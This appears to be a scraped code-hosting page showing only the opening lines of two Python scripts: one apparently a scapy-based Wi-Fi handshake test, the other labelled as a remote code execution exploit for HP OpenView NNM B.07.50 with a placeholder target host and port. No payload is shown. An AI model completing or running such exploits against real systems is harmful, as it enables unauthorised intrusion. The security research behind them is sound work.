This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
import logging | |
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) | |
from scapy.all import * | |
import sys, socket, struct, time, subprocess, atexit, select | |
from datetime import datetime | |
IEEE_TLV_TYPE_RSN = 48 | |
IEEE_TLV_TYPE_FT = 55 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# HP OpenView NNM B.07.50 Remote Code Execution exploit | |
# by Mariusz B. / mgeeky, 17' | |
import struct | |
import socket | |
HOST = '192.168.XXX.YYY' | |
PORT = 7510 |